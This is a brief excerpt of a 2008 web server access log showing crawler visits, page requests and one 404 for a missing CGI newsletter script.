74.6.20.34 - - [10/Feb/2008:19:45:56 +0100] "GET /f-contact.html HTTP/1.0" 200 6804 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
193.252.149.16 - - [10/Feb/2008:20:16:01 +0100] "GET /robots.txt HTTP/1.1" 200 64 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (http://www.voila.com/)"
193.252.149.16 - - [10/Feb/2008:20:16:19 +0100] "GET /world.html HTTP/1.1" 200 16295 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (http://www.voila.com/)"
74.6.22.18 - - [10/Feb/2008:20:19:14 +0100] "GET /f-net.html HTTP/1.0" 200 9913 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
193.252.149.16 - - [10/Feb/2008:20:36:33 +0100] "GET /robots.txt HTTP/1.1" 200 64 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (http://www.voila.com/)"
193.252.149.16 - - [10/Feb/2008:20:36:35 +0100] "GET /framez.html HTTP/1.1" 200 4130 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (http://www.voila.com/)"
193.252.149.16 - - [10/Feb/2008:20:36:55 +0100] "GET /frame-inhalt.html HTTP/1.1" 200 6025 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (http://www.voila.com/)"
193.252.149.16 - - [10/Feb/2008:20:36:55 +0100] "GET /frame-unten.html HTTP/1.1" 200 5557 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (http://www.voila.com/)"
193.252.149.16 - - [10/Feb/2008:20:36:55 +0100] "GET /frame-menu.html HTTP/1.1" 200 10763 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (http://www.voila.com/)"
190.172.184.19 - - [10/Feb/2008:20:45:23 +0100] "GET /cgi-bin/newsletter/s.pl HTTP/1.1" 404 2748 "http://various-euro.com/cgi-bin/newsletter/s.pl" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
84.44.7.96 - - [10/Feb/2008:21:05:23 +0100] "GET / HTTP/1.1" 200 10335 "-" "Internet Explorer/7.0 (compatible; MSIE 5.12; Windows XP SP2)"
84.44.7.210 - - [10/Feb/2008:21:05:24 +0100] "GET / HTTP/1.0" 200 10335 "-" "Internet Explorer/7.0 (compatible; MSIE 5.12; Windows XP SP2)"
84.44.7.210 - - [10/Feb/2008:21:05:25 +0100] "GET / HTTP/1.0" 200 10335 "-" "Internet Explorer/7.0 (compatible; MSIE 5.12; Windows XP SP2)"
